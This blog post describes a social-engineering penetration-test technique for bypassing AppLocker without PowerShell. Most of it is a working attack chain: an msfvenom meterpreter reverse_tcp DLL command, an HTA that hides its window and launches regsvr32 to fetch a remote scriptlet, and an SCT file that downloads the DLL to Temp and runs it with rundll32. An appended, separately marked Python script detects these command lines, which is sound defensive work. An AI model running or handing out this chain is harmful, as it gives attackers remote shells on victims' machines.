Elliot Speck Disk Space Invader

Chaining to Bypass AppLocker Without PowerShell

One of the services we provide at work is a “human factor penetration test”, or a social engineering engagement. We position ourselves as an attacker and treat the engagement as a completely red-team exercise to attempt to gain access to the corporate environment without being provided any knowledge of the inner workings of it. Generally speaking, environments either do not have AppLocker or any form of application whitelisting enabled, and/or have PowerShell enabled for use by all users. Recently, I encountered an environment where both of these were false. Luckily (well, for an attacker), I found it was possible to chain a number of previous attacks together in order to bypass both in one fell swoop.

Generate Payload:

	msfvenom -p windows/meterpreter/reverse_tcp EXITFUNC=thread LHOST= LPORT=443 -a x86 -f dll -o out.dll

Your .HTA file:

	<script language="VBScript">
		' Push the HTA window off-screen so nothing is visible to the user.
		window.moveTo -4000, -4000
		Set objShell = CreateObject("Wscript.Shell")
		' Hand off to regsvr32, which fetches the remote scriptlet and runs it through scrobj.dll.
		objShell.Run("regsvr32 /u /n /s /i:https://your-domain.com/sct.sct scrobj.dll")
	</script>

Your .SCT file:

	<?XML version="1.0"?>
	<registration progid="ProgramID" classid="{10001111-0000-0000-0000-0000FEEDACDC}">
		<script language="VBScript">
			' Build an output path under the user's Temp folder (GetSpecialFolder(2)).
			Set FSO = CreateObject("Scripting.FileSystemObject")
			Set TMPDir = FSO.GetSpecialFolder(2)

			DLLDir = TMPDir & "\" & FSO.GetTempName()
			OutFile = DLLDir & "\" & "MSFDLL.dll"

			Dim BinaryStream

			Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")
			Set ByteStream = CreateObject("ADODB.Stream")

			' Prepare a synchronous GET for the DLL generated by msfvenom.
			XMLHTTP.Open "GET", "https://your-domain.com/path/to/your/dll.dll", False

			' Type 1 = adTypeBinary; write the response body to disk as the DLL.
			With ByteStream
				.Type = 1
				.Write XMLHTTP.ResponseBody
				.SaveToFile OutFile
			End With

			' Load the dropped DLL via rundll32 with a hidden window, waiting for it to exit.
			Set WSS = CreateObject("Wscript.Shell")
			WSS.Run "C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL " & OutFile, 0, true
		</script>
	</registration>

However, some antivirus products detect this, so let’s go one stage deeper and add some mitigations to their mitigations, no?

Neat, huh? Having this “just work” would, obviously, be irresponsible. While you could copy and paste this code, edit the template a touch, push it to a server and have it work, modern antivirus will detect the HTA file as malware. How to mitigate this is left as an exercise for the reader.
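Detection logic for the chain described above, added here as an example that is not part of the original post: it classifies constructed process-creation records (Sysmon Event ID 1 style; the field names `parent`, `image` and `cmdline` are assumptions) by the regsvr32 `/i:` remote scriptlet with scrobj.dll, rundll32 loading a DLL from the user Temp folder, and a script runner as parent process.

```python
import ntpath
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, trimmed
# to three fields). Events 0 and 1 are the chain from this post; 2 and 3 are benign.
EVENTS = [
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 /u /n /s /i:https://your-domain.com/sct.sct scrobj.dll"},
    {"parent": r"C:\Windows\System32\regsvr32.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL "
                r"C:\Users\bob\AppData\Local\Temp\rad1A2B.tmp\MSFDLL.dll"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\comlib.dll"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]

# Command-line patterns taken directly from the chain above.
CMDLINE_RULES = [
    ("regsvr32_remote_scriptlet", re.compile(r"regsvr32.*\s/i:\s*https?://", re.I)),
    ("regsvr32_scrobj", re.compile(r"regsvr32.*\bscrobj\.dll", re.I)),
    ("rundll32_dll_from_temp", re.compile(r"rundll32.*\\Temp\\.*\.dll\b", re.I)),
]
# regsvr32 counts as a script runner here because scrobj.dll makes it execute scriptlets.
SCRIPT_RUNNERS = {"mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe"}


def classify(event):
    """Return the names of every rule the event triggers (empty list if benign)."""
    hits = [name for name, rx in CMDLINE_RULES if rx.search(event["cmdline"])]
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    if parent in SCRIPT_RUNNERS and image in LOLBINS:
        hits.append("lolbin_spawned_by_script_runner")
    return hits


def triage(events):
    """Map event index -> triggered rules, keeping only events with at least one hit."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}


if __name__ == "__main__":
    for i, rules in triage(EVENTS).items():
        print(f"event {i}: {', '.join(rules)}")
```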